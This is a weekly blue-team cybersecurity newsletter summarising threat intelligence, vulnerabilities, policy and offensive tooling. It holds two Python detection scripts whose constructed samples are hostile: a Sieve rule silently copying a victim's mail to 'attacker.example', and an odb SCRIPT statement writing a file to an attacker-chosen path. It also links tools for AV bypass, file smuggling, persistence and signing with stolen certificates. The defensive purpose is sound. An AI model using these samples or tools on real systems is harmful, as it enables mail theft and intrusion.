Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week there was the usual constant contact of chaos, but nothing overly standout other than Microsoft’s revelation of the DDoS attacks Azure experienced and the resulting impact in early June. That and the fact that there continue to be more MOVEit vulnerabilities - an exemplar of vuln surging in action.
In the high-level this week:
UK to give Ukraine major boost to mount counteroffensive - Up to £25 million expansion to harden Ukraine’s cyber defences as Russia continues its callous attacks
Justice Department Announces New National Security Cyber Section Within the National Security Division - This new section will allow NSD to increase the scale and speed of disruption campaigns and prosecutions of nation-state threat actors, state-sponsored cybercriminals, associated money launderers, and other cyber-enabled threats to national security
Russia-aligned hackers pose threat to Canada energy sector - spy agency - "We assess there is an even chance of a disruptive incident in the oil and gas sector in Canada caused by Russia-aligned actors, due to their higher tolerance for risk, the increase in their numbers and activity, as well as the number of vulnerable targets in the sector overall."
Peters Introduces Bipartisan Bill to Strengthen American Cybersecurity Partnerships with International Partners and Allies to Prevent Attacks - The bill would allow the Department of Homeland Security (DHS) to quickly provide support to foreign partners, such as Ukraine, that continue to face increasing cybersecurity threats. The legislation would also ensure that the Cybersecurity and Infrastructure Security Agency (CISA) can work with international allies to strengthen our nation’s defenses and protect critical foreign networks like financial markets and oil pipelines that are essential to the global economy.
Khashoggi’s widow sues Israeli firm over spyware she says ruined her life - In the lawsuit, Hanan Elatr says Saudi Arabia used NSO’s Pegasus spyware to track her and her husband’s whereabouts before he was murdered
Global protection against cybercrime now within reach - The chair of the process, HE Faouzia Mebarki, is about to publish a draft of the convention for discussion, based on agreements reached by UN member states and outlining proposed compromises on the remaining contentious issues.
Who’s Afraid of the SEC? - The SEC wants to require fast, public disclosure of cybersecurity incidents. These rules could benefit investors—and the cyber ecosystem.
Log4J Lesson Learned from the Financial Services Cross Market Operational Resilience Group - Log4j was another warning sign of the growing complexity and dynamic nature of the security landscape, particularly with software components that are an ever-increasing part of our complex digital world.
China tightens controls on cross-border data transfers - On June 1, the Measures on the Standard Contract for the Cross-Border Transfer of Personal Information came into effect, requiring certain personal data processors, including companies handling data on fewer than 1 million people, to sign contracts with overseas recipients before sending data abroad.
Russia will spend 4.8 billion on a special "Internet for the authorities" - the UK had a model similar to this with the Public Services Network, which we deprecated.
Shadayev said that state-owned companies are required to switch to basic Russian software by January 1, 2025 - state-owned companies should switch to the use of Russian operating systems, office software, DBMS and virtualization systems, Maksut Shadayev, head of the Ministry of Digital Development, said on Saturday during SPIEF-2023 - the balkanization of technologies at pace.
Hackers hacked into the management of the equipment of the Selyatino agricultural hub in the Moscow region - tried to spoil 40,000 tons of frozen products
Related, from the US: Food Producers Band Together in Face of Cyber Threats - Companies launch information-sharing platform for industry as attacks mount
Privacy-enhancing technologies (PETs) from the UK’s Information Commissioners Office - we have created new PETs guidance, which is aimed at data protection officers and others who are using large personal data sets in finance, healthcare, research, and central and local government
Artificial Intelligence - An Accountability Framework for Federal Agencies and Other Entities - from the US’s Government Accountability Office
Courts
Progress Software (makers of MOVEit) sued in class action lawsuit - Software liability for cyber security trundles down the runway.
Massachusetts Man Sentenced for Computer Intrusion - industrial espionage via SIM swapping
U.K. Citizen Extradited and Pleads Guilty to Cyber Crime Offenses - O’Connor used his sophisticated technological abilities for malicious purposes – conducting a complex SIM swap attack to steal large amounts of cryptocurrency, hacking Twitter, conducting computer intrusions to take over social media accounts, and even cyberstalking two victims, including a minor victim
Intelligent Generation of Tools for Security (INGOTS) - a very interesting DARPA program - The INGOTS program will develop novel approaches, driven by program analysis and Artificial Intelligence (AI), to measure vulnerabilities within modern, complex systems
Recommendation of the Council on the Governance of Digital Identity from the OECD
Shifting paradigms in platform regulation - Moreover, the more exorbitant the assertion of jurisdiction, the greater the headache of enforcement. Which in turn leads to what we see in the UK Online Safety Bill, namely provisions for disrupting the activities of the non-compliant foreign platform: injunctions against support services such as banking or advertising, and site blocking orders against ISPs.
Analysis exploring risks and opportunities linked to the use of collaborative industrial robots in Europe - The necessary security in human-robot collaboration limits the development of collaborative robots and prevents them from achieving the benefits of traditional industrial robots. It is therefore necessary to advance in key aspects such as detection of humans and increased security.
No reflections this week as I have been in a lot of meetings so have not had much time to ponder outside of those.
On the interesting job/role front (thanks to those sending me these):
Crime Prevention and Criminal Justice Officer - Programme Officer (Cybercrime Legal and Policy) at the United Nations
Deputy Director of Cyber, Technology and Security at the Australian Strategic Policy Institute
Assistant Director, Cyber Statecraft Initiative at the Atlantic Council
Chief Information Security Officer (CISO) at the United Nations World Food Programme in Rome Italy - I have been advised they will pay relocation to Rome
Have a lovely Friday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Russia
APT28 group used three Roundcube exploits (CVE-2020-35730, CVE-2021-44026, CVE-2020-12641) during another espionage campaign
Two bits of reporting on this exploitation by Russia. The elegance of the intelligence collection operation, redirecting the victims’ email through vulnerability exploitation, can’t be overstated.
during the investigation of the contents of the mailbox of the computer user, an e-mail with the subject "News of Ukraine" was discovered, received on 12.05.2023 from the address "ukraine_news@meta[.]ua", which contained bait content in the form of an article from the publication "NV" (nv.ua), as well as an exploit for the vulnerability in Roundcube CVE-2020-35730 (XSS) and the corresponding JavaScript code designed to load and run additional JavaScript files: "q.js" and "e.js".
https://cert.gov.ua/article/4905829
BlueDelta Exploits Ukrainian Government Roundcube Mail Servers to Support Espionage Activities
Vendor reporting on the same, which the Ukrainian government acknowledged.
We identified BlueDelta activity highly likely targeting a regional Ukrainian prosecutor's office and a central Ukrainian executive authority, as well as reconnaissance activity involving additional Ukrainian government entities and an organization involved in Ukrainian military aircraft infrastructure upgrade and refurbishment.
the analyzed BlueDelta phishing campaign exploits the vulnerabilities CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026 in the open-source webmail software Roundcube in order to run multiple reconnaissance and exfiltration scripts.
The malicious scripts are designed to redirect a victim’s future incoming emails to an actor-controlled email address, perform reconnaissance on the target Roundcube server, exfiltrate the victim’s Roundcube session cookie and address book, along with session and user information from Roundcube’s database
https://go.recordedfuture.com/hubfs/reports/cta-2023-0620.pdf
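The operational effect described above is a mail-redirect rule left on the victim's account. As an added detection example (not code from either report), the script below assumes Roundcube filters are stored as Sieve scripts via the managesieve plugin and flags any redirect rule pointing outside an allow-list of internal domains; the sample script, the domain allow-list and the attacker address are constructed.

```python
import re
from dataclasses import dataclass

# Constructed: domains treated as "ours"; a redirect anywhere else is suspicious.
INTERNAL_DOMAINS = {"example.gov.ua"}

# Matches a Sieve redirect action, with optional tagged args such as :copy,
# e.g.  redirect :copy "someone@somewhere.example";
REDIRECT_RE = re.compile(
    r'\bredirect\b(?P<opts>(?:\s+:[a-z]+)*)\s+"(?P<addr>[^"]+)"\s*;',
    re.IGNORECASE,
)


@dataclass
class Finding:
    line: int
    address: str
    copy: bool       # :copy keeps a copy in the mailbox, so the victim sees nothing missing
    external: bool   # target domain is not on the internal allow-list


def find_redirects(script: str, internal_domains=INTERNAL_DOMAINS):
    """Return every redirect action in a Sieve script, annotated for triage."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        # Drop '#' line comments (simplification: a '#' inside a string is also cut).
        stripped = line.split("#", 1)[0]
        for m in REDIRECT_RE.finditer(stripped):
            addr = m.group("addr")
            domain = addr.rsplit("@", 1)[-1].lower()
            findings.append(Finding(
                line=lineno,
                address=addr,
                copy=":copy" in m.group("opts").lower(),
                external=domain not in internal_domains,
            ))
    return findings


def external_redirects(script: str):
    """Just the findings worth paging someone about: mail leaving our domains."""
    return [f for f in find_redirects(script) if f.external]


# Constructed sample Sieve script: one legitimate filing rule, one siphoning rule.
SAMPLE_SCRIPT = """require ["copy", "fileinto"];
# constructed sample: a legitimate filing rule
if header :contains "subject" "invoice" { fileinto "Invoices"; }
# constructed sample: rule of the kind found after an account compromise
if true { redirect :copy "collector@attacker.example"; }
"""

if __name__ == "__main__":
    for f in external_redirects(SAMPLE_SCRIPT):
        flag = "silent copy" if f.copy else "full redirect"
        print(f"line {f.line}: mail {flag} to external address {f.address}")
```

Run it against each user's active Sieve script (Dovecot keeps them under the user's mail home) and alert on any non-empty result, ideally on every change to a script rather than on a schedule.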
Cyber attack by group UAC-0057 (GhostWriter) against the state organization of Ukraine using PicassoLoader and Cobalt Strike Beacon
Russia shows that they continue to use rather basic techniques in the hope of hitting gold.
[We] discovered the PPT document "daewdfq342r.ppt", which contains a macro and a thumbnail image with the emblem of the National Defense University of Ukraine named after Ivan Chernyakhivskyi.
If the document is opened and the macro is activated, an executable file "%APPDATA%\Signal_update_6.0.3.4\glkgh90kjykjkl650kj0.dll" will be created on the victim's computer, as well as a shortcut file designed to run the latter.
https://cert.gov.ua/article/4905718
Shuckworm: Inside Russia’s Relentless Cyber Campaign Against Ukraine
Russian threat actor who uses phishing as their initial infection vector.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
North Korea
Lots of tactical reporting omitted this week as, again, there was so much. It can be found on the subreddit.
APT37 attack targeting macOS users in South Korea
North Korea continues to show its macOS capability muscle.
macOS-based spear phishing attack targeting South Koreans
The sixth attempt to gain access by disguising the lure as materials for the Responsibility to Protect (R2P) international conference
Disguising a Korean HWP document icon on Apple’s macOS to induce the user to open the app
Use of command and control (C2) servers disguised as Samsung Galaxy Note domains
Malicious AppleScript installed via the standard OSA (Open Scripting Architecture)
Registering a LaunchAgent for persistence
Use of the same C2 and information-stealing technique seen behind the APT37 attack
First discovery of the shortcut (LNK) malicious file creation tool used by the attacker
https://www.genians.co.kr/blog/threat_intelligence_report_macos
https://www.genians.co.kr/hubfs/blogfile/20230620_threat_inteligence_report_apt37_macos.pdf
Lazarus fake recruiter campaign implant
North Korean legacy campaign subject to detailed South Korean reporting. Their social engineering tradecraft and persistence continue to impress and make up for their lack of technical capabilities.
Since June of last year, the North Korean hacking group Lazarus has been modifying open-source software such as PuTTY, KiTTY, TightVNC, Sumatra PDF Reader and muPDF/Subliminal Recording into malware. They disguise themselves as a recruiter for a specific company on LinkedIn, approach engineers and spread the malicious code. The modified open-source software does not perform malicious actions just by being run; it uses an attack method in which the malicious action starts only when a specific event occurs, such as the user opening a specific PDF or connecting to a specific server with the modified PuTTY.
https://download.hauri.net/DownSource/down/dwn_detail_down.html?uid=51
macOS implant
Two bits of reporting on the same capability here.
Jokerspy
Colson Wilhoit, Salim Bitam, Seth Goodwin, Andrew Pease and Ricardo Ungureanu provide a hint as to the initial infection vector.
REF9134 leverages custom and open source tools for reconnaissance and command and control
Targets of this activity include a cryptocurrency exchange in Japan
The xcc binary was executed via bash by three separate processes:
/Applications/IntelliJ IDEA.app/Contents/MacOS/idea
/Applications/iTerm.app/Contents/MacOS/iTerm2
/Applications/Visual Studio Code.app/Contents/MacOS/Electron
While we are still investigating and continuing to gather information, we strongly believe that the initial access for this malware was a malicious or backdoored plugin or 3rd party dependency that provided the threat actor access.
https://www.elastic.co/security-labs/inital-research-of-jokerspy
Fragments of Cross-Platform Backdoor Hint at Larger Mac OS Attack
Andrei LAPUSNEANU and Bogdan BOTEZATU report on the same and the vapors around it on VirusTotal.
our Mac researchers stumbled upon a small set of files with backdoor capabilities that seem to form part of a more complex malware toolkit. The following analysis is incomplete, as we are trying to identify the puzzle pieces that are still missing.
As of now, these samples are still largely undetected and very little information is available about any of them.
https://bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/
China
Beyond the Horizon: Traveling the World on Camaro Dragon’s USB Flash Drives
Chinese threat actor and the horror story of why USB continues to be a source of anxiety for a lot of organizations.
Patient Zero in the malware infection was identified as an employee who had participated in a conference in Asia. He shared his presentation with fellow attendees using his USB drive. Unfortunately, one of his colleagues had an infected computer, so his own USB drive unknowingly became infected as a result. Upon returning to his home hospital in Europe, the employee introduced the infected USB drive to the hospital’s computer systems, which led the infection to spread.
The malware gained access to the healthcare institution systems through an infected USB drive. During the investigation, the Check Point Research (CPR) team discovered newer versions of the malware with similar capabilities to self-propagate through USB drives. In this way, malware infections originating in Southeast Asia spread uncontrollably to different networks around the globe, even if those networks are not the threat actors’ primary targets.
The main payload variant, called WispRider, has undergone significant revisions. In addition to backdoor capabilities and the ability to propagate through USB using the HopperTick launcher, the payload includes additional features, such as a bypass for SmadAV, an anti-virus solution popular in Southeast Asia. The malware also performs DLL-side-loading using components of security software, such as G-DATA Total Security, and of two major gaming companies (Electronic Arts and Riot Games). Check Point Research responsibly notified these companies on the above-mentioned use of their software by the attackers.
The prevalence and nature of the attacks using self-propagating USB malware demonstrate the need of protecting against those, even for organizations that may not be the direct targets of such campaigns. We found evidence of USB malware infections at least in the following countries: Myanmar, South Korea, Great Britain, India and Russia.
Graphican: Flea Uses New Backdoor in Attacks Targeting Foreign Ministries
Another Chinese implant in this reporting. E-mail appears to be the initial access vector.
This campaign was primarily focused on foreign affairs ministries in the Americas, although the group also targeted a government finance department in a country in the Americas and a corporation that sells products in Central and South America. There was also one victim based in a European country, which was something of an outlier.
Flea used a large number of tools in this campaign. As well as the new Graphican backdoor, the attackers leveraged a variety of living-off-the-land tools, as well as tools that have been previously linked to Flea. We will detail these tools in this section.
Behind the Scenes: Unveiling the Hidden Workings of Earth Preta
Sunny Lu, Vickie Su and Nick Dai provide further detail into the modus operandi of this Chinese threat actor. A lot of social engineering and e-mail as the initial access vector.
In 2023, we observed Earth Preta using several new arrival vectors, including MIROGO, QMAGENT, and the new TONESHELL dropper called TONEDROP. Likewise, the infection chains of these arrival vectors have also changed. For example, in addition to deploying legitimate Google Drive download links, the actors also used other download sites that resembled but were not actually Google Drive pages.
Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor, Suspected Links to China
Austin Larsen, John Palmisano, Mathew Potaczek, John Wolfram and Matthew Mcwhirt detail the Chinese exploitation of this zero day. The capability of China and their willingness to use it continue to alarm. However, we must also take confidence in our ability to detect and respond.
Between May 22, 2023 and May 24, 2023, UNC4841 countered with high frequency operations targeting a number of victims located in at least 16 different countries. Overall, Mandiant identified that this campaign has impacted organizations across the public and private sectors worldwide, with almost a third being government agencies.
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
Uncovering a New Activity Group Targeting Governments in the Middle East and Africa
Lior Rochberger details a likely Chinese threat actor whose initial access vector is exploiting web services running on IIS to deploy web shells. The product placement in this post is very high, so hold on.
During an investigation of one of the instances, we observed a series of failed attempts to execute the infamous China Chopper webshell. In the following days after the failed attempts, we observed a new suspicious activity originating from the Exchange Server’s w3wp.exe process, which upon investigation appeared to be resulting from an in-memory VBscript implant deployed by the threat actor.
DoNot APT Elevates its Tactics by Deploying Malicious Android Apps on Google Play Store
Suspected Indian state threat actor who ups their game and aggression: no more sideloading for their Android implants. I suspect they use social engineering to entice the user to install from Google Play.
The apps were stationed under an account named “SecurITY Industry” on Google Play Store. A total of three Android apps were hosted with the name Device Basic Plus, nSure Chat, and iKHfaa VPN, with two of them having malicious characteristics, that are nSure Chat and iKHfaa VPN. The threat actor used cleaned and innocent Android Libraries and made them fetch contacts and the location of the compromised victim. iKHfaa VPN copied its code from a genuine VPN service provider and injected additional libraries to silently perform malicious activity.
Fake Security Researcher GitHub Repositories Deliver Malicious Implant
Jacob Baines details a campaign against the very fabric of security society. The persistence of the threat is of note. This has whiffs of the North Korean campaign a couple of years ago.
In early May, [we] came across a malicious GitHub repository that claimed to be a Signal 0-day. The team reported the repository to GitHub, and it was quickly taken down. The same scenario continued throughout May.
Recently, the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security, and even using headshots of legitimate security researchers from companies like Rapid7.
Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product, including Chrome, Exchange, Discord, and more. Some of the accounts even advertise their “findings” on Twitter.
Security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing, and don’t use anything you don’t understand.
https://vulncheck.com/blog/fake-repos-deliver-malicious-implant
Discovery
How we find and understand the latent compromises within our environments.
New Techniques: Uncovering Tor Hidden Service with Etag
Japanese researcher releases a technique which OPSEC-aware threat actors will now adapt to avoid.
The de-anonymization method using Etag is almost unknown to the public, and I believe that it is a valuable contribution to the community.
https://sh1ttykids.medium.com/new-techniques-uncovering-tor-hidden-service-with-etag-5249044a0e9d
Automating acquisition for incident response
Nikolas Mantas brings a massive capability uplift to Azure cyber incident response. You can see many Managed Service Providers adopting this.
In this blog we discuss the significance of automation during the incident response process and introduce a (downloadable!) playbook for Microsoft Azure that leverages Logic Apps to streamline the collection of evidence upon incident notification, based on a predefined criticality of your systems.
https://falconforce.nl/falconfriday-automating-acquisition-for-incident-response-0xff23/
Defence
How we proactively defend our environments.
Guide to Mitigate BlackLotus Threat
US Government (NSA) provides advice on how to mitigate this root-of-trust underminer.
BlackLotus exploits a known vulnerability called “Baton Drop,” CVE-2022-21894, which bypasses security features during the device’s startup process, also known as Secure Boot. The malware targets Secure Boot by exploiting vulnerable boot loaders not added into the Secure Boot Deny List Database (DBX).
win32-app-isolation: Tools and documentation for Win32 app isolation
Microsoft release a means to further constrain arbitrary applications on Windows to provide further defense in depth.
Win32 app isolation is a new security feature on Windows that helps contain the damage and safeguard user privacy choices in the event of an application compromise. Win32 app isolation is built on the foundation of AppContainers, which offer a security boundary, and components that virtualize resources and provide brokered access to other resources. This repo contains the documentation and tools to help you isolate your applications.
https://github.com/microsoft/win32-app-isolation
Vulnerability
Our attack surface.
GitHub Dataset Reveals Millions Potentially Vulnerable to RepoJacking
Ilay Goldman and Yakir Kadkoda highlight a vulnerability class which is going to be extensive. It will be interesting to see if GitHub responds at a service level to this or not.
There are some restrictions about the capability of the attacker of opening the old repository name (the restrictions are called retired names). However, they are applied only on popular repositories that were popular before the rename, and recently researchers found many bypasses to these restrictions allowing attackers to open any repository they want.
CVE-2023-1183 | LibreOffice - Arbitrary File Write in hsqldb 1.8.0
Not sure who uses LibreOffice in anger, but this is a pretty special vulnerability due to the nested nature and the fact it stems from the underlying technology.
LibreOffice supports embedded databases in its odb file format. The most common format is hsqldb. LibreOffice typically contains a copy of hsqldb version 1.8.0 to load this format. Each odb file contains a "database/script" file which hsqldb parses to setup the database. Hsqldb supports a "SCRIPT" keyword which is normally used to record the commands input by the database admin to output such a script. In affected versions of LibreOffice, an attacker could craft an odb containing a "database/script" file which itself contained a SCRIPT command where the contents of the file could be written to a new file whose location was determined by the attacker.
https://www.libreoffice.org/about-us/security/advisories/cve-2023-1183/
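Because the dangerous SCRIPT statement sits inside the odb container, it can be spotted before the file reaches LibreOffice. The scanner below is an added example (not the project's or advisory's code): it opens an odb as the zip it is, reads the embedded hsqldb "database/script" named in the advisory, and reports any SCRIPT statement together with the path it would write to; the sample odb contents and the target path are constructed.

```python
import io
import re
import zipfile

# hsqldb 1.8 statement of the form  SCRIPT '<path>'  (SQL single-quoted string,
# with '' as the escape for a literal quote). Anchored at line start so a SCRIPT
# word inside an INSERT value is not matched.
SCRIPT_RE = re.compile(r"^\s*SCRIPT\s+'((?:[^']|'')*)'", re.IGNORECASE)

# Path of the hsqldb script inside the odb container, as named in the advisory.
EMBEDDED_SCRIPT = "database/script"


def scan_script_text(text: str):
    """Return (line_number, target_path) for every SCRIPT statement found."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = SCRIPT_RE.match(line)
        if m:
            hits.append((lineno, m.group(1).replace("''", "'")))
    return hits


def scan_odb(data: bytes):
    """Scan odb bytes; an odb without an embedded hsqldb script is simply clean."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if EMBEDDED_SCRIPT not in zf.namelist():
            return {"embedded_script": False, "hits": []}
        text = zf.read(EMBEDDED_SCRIPT).decode("utf-8", errors="replace")
    return {"embedded_script": True, "hits": scan_script_text(text)}


def build_sample_odb(script_lines):
    """Constructed minimal odb: just the ODF mimetype entry plus the hsqldb script."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.database")
        zf.writestr(EMBEDDED_SCRIPT, "\n".join(script_lines) + "\n")
    return buf.getvalue()


# Constructed: what a normal embedded-hsqldb script looks like (DDL and data only).
BENIGN_SCRIPT = [
    'SET DATABASE COLLATION "Latin1_General"',
    'CREATE CACHED TABLE "Customers"("ID" INTEGER NOT NULL PRIMARY KEY,"Name" VARCHAR(50))',
    'INSERT INTO "Customers" VALUES(1,\'Alice\')',
]
# Constructed: same script with the statement class the advisory describes appended.
MALICIOUS_SCRIPT = BENIGN_SCRIPT + ["SCRIPT '/tmp/attacker-chosen-path.txt'"]

if __name__ == "__main__":
    for label, lines in (("benign", BENIGN_SCRIPT), ("malicious", MALICIOUS_SCRIPT)):
        result = scan_odb(build_sample_odb(lines))
        for lineno, path in result["hits"]:
            print(f"{label}: line {lineno} would write hsqldb script to {path}")
        print(f"{label}: {len(result['hits'])} SCRIPT statement(s)")
```

Any hit is worth quarantining: a legitimately exported odb has no reason to carry a SCRIPT statement in its embedded script.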
Freaky Leaky SMS: Extracting User Locations by Analyzing SMS Timings
Evangelos Bitsikas, Theodor Schnitzler, Christina Pöpper and Aanjhan Ranganathan show that data science is going to enable the discovery of numerous side channels that would have otherwise been thought of as impossible.
Our results show that, after training an ML model, the SMS sender can accurately determine multiple locations of the recipient. For example, our model achieves up to 96% accuracy for locations across different countries, and 86% for two locations within Belgium. Due to the way cellular networks are designed, it is difficult to prevent Delivery Reports from being returned to the originator making it challenging to thwart this covert attack without making fundamental changes to the network architecture.
https://arxiv.org/abs/2306.07695
Video-Based Cryptanalysis
Ben Nassi, Etay Iluz, Ofek Vayner, Or Cohen, Dudi Nassi, Boris Zadov and Yuval Elovici bring Hollywood to life with this research. It will be interesting to see how and if this capability bleeds into the NSO like companies. The mitigation is electrical tape over your LEDs obviously.
Exploiting a Video Camera's Rolling Shutter to Recover Secret Keys from Devices Using Video of Their Power LED - demonstrate the application of video-based cryptanalysis by performing two side-channel cryptanalytic timing attacks and recover: (1) a 256-bit ECDSA key
https://www.nassiben.com/video-based-crypta
Vulnerability in WooCommerce Stripe Gateway Plugin - used by 900,000 sites
GDPR called and wants its vulnerability back.
This plugin suffers from an Unauthenticated Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability allows any unauthenticated user to view any WooCommerce order’s PII data including email, user’s name, and full address.
WordPress: 1+ Million Sites Affected by Critical Privilege Escalation Vulnerability in Essential Addons for Elementor Plugin
The 90s called and want their vulnerability back.
This plugin suffers from an unauthenticated privilege escalation vulnerability and allows any unauthenticated user to escalate their privilege to that of any user on the WordPress site.
Offense
Attack capability, techniques and trade-craft.
Evasive File Smuggling with Skyhook
Justin Angel releases a work aid which one suspects will be co-opted by various malicious actors rather quickly. I also suspect data science will help with detecting its use.
Skyhook was developed to cut the manual nonsense out of applying obfuscation to bypass network-based controls. An HTTP(S) file server is used to seamlessly read plaintext files from disk and serve them to clients in obfuscated chunks. Each chunk passes through a series of pipelined algorithms called obfuscators that alter the content in transit. In addition to the file content, file listings, and names are passed through the same chain to prevent leakage.
https://www.blackhillsinfosec.com/evasive-file-smuggling-with-skyhook/
hermes-the-messenger: A PoC for achieving persistence via push notifications on Windows
Nikos Laleas details how to use Windows Push Notifications as a persistence mechanism. 🏅 to the first person to produce a Velociraptor artifact.
Essentially, we register the app to handle incoming notifications, even when it's not running, and we request a channel Uri for the AAD app created previously.
https://www.persistent-security.net/post/beacon-on-demand-abusing-push-notifications-for-persistence
https://github.com/persistent-security/hermes-the-messenger
Exploitation
What is being exploited.
openfire鉴权绕过漏洞原理解析 - Openfire Authentication Bypass Vulnerability Principle Analysis
Chinese analysis of this vulnerability which is actively being exploited in the wild.
An authentication bypass vulnerability exists in Openfire that allows an unauthenticated user in a configured Openfire environment using an unauthenticated Openfire Setup environment to access restricted pages in the Openfire Admin Console reserved for administrative users.
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Over 20 vulnerabilities in a range of products from CCTV DVR to routers.
https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
MagicSigner: Signtool for expired certificates
Got access to a stolen, unrevoked code signing certificate? Then this is what you need.
Patcher DLL for signtool that allows signing with expired certificates
https://github.com/namazso/MagicSigner
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
BypassAV: This map lists the essential techniques to bypass anti-virus and EDR
Threat activity and vulnerabilities in Indonesia, Malaysia, Philippines, and Thailand
The Experience of Cybercrime in Georgia: Awareness, Victimisation and Reporting
Artificial Intelligence and Data Protection in Latin America
The Secret Sauce behind 100K context window in LLMs: all tricks in one place
Tracing Ransomware Threat Actors Through Stylometric Analysis and Chat Log Examination
This newsletter is produced by BinaryFirefly; it is via BinaryFirefly that I support a hand-picked set of organisations across investment, strategy and capability in the domain of cyber.
For sponsorship enquiries regarding Bluepurple or anything else contact hello@binaryfirefly.com.